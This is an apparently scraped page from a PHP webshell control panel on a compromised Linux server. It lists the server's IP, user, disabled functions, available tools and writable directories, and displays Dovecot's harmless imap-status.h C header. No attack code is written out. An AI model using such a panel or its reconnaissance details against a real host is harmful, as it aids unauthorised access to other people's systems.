403Webshell
Server IP : 88.99.149.37  /  Your IP : 216.73.216.141
Web Server : nginx/1.31.2
System : Linux server-88-99-149-37 6.12.0-124.56.5.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Fri May 15 06:12:08 EDT 2026 x86_64
User : muralimurth ( 1015)
PHP Version : 8.4.23
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/1/root/usr/include/dovecot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/1/root/usr/include/dovecot/imap-status.h
#ifndef IMAP_STATUS_H
#define IMAP_STATUS_H

enum imap_status_item_flags {
	IMAP_STATUS_ITEM_MESSAGES = BIT(0),
	IMAP_STATUS_ITEM_RECENT = BIT(1),
	IMAP_STATUS_ITEM_UIDNEXT = BIT(2),
	IMAP_STATUS_ITEM_UIDVALIDITY = BIT(3),
	IMAP_STATUS_ITEM_UNSEEN = BIT(4),
	IMAP_STATUS_ITEM_HIGHESTMODSEQ = BIT(5),
	IMAP_STATUS_ITEM_SIZE = BIT(6),
	IMAP_STATUS_ITEM_DELETED = BIT(7),

	IMAP_STATUS_ITEM_X_SIZE = BIT(16), /* to be deprecated */
	IMAP_STATUS_ITEM_X_GUID = BIT(17),
};

struct imap_status_items {
	enum imap_status_item_flags flags;
};

struct imap_status_result {
	struct mailbox_status status;
	struct mailbox_metadata metadata;
	enum mail_error error;
	const char *errstr;
};

static inline bool
imap_status_items_is_empty(const struct imap_status_items *items)
{
	return (items->flags == 0);
}

int imap_status_parse_items(struct client_command_context *cmd,
			    const struct imap_arg *args,
			    struct imap_status_items *items_r);

int imap_status_get_result(struct client *client, struct mailbox *box,
			   const struct imap_status_items *items,
			   struct imap_status_result *result_r);
int imap_status_get(struct client_command_context *cmd,
		    struct mail_namespace *ns, const char *mailbox,
		    const struct imap_status_items *items,
		    struct imap_status_result *result_r);

int imap_status_send(struct client *client, const char *mailbox_mutf7,
		     const struct imap_status_items *items,
		     const struct imap_status_result *result)
	ATTR_NOWARN_UNUSED_RESULT;

#endif

Youez - 2016 - github.com/yon3zu
LinuXploit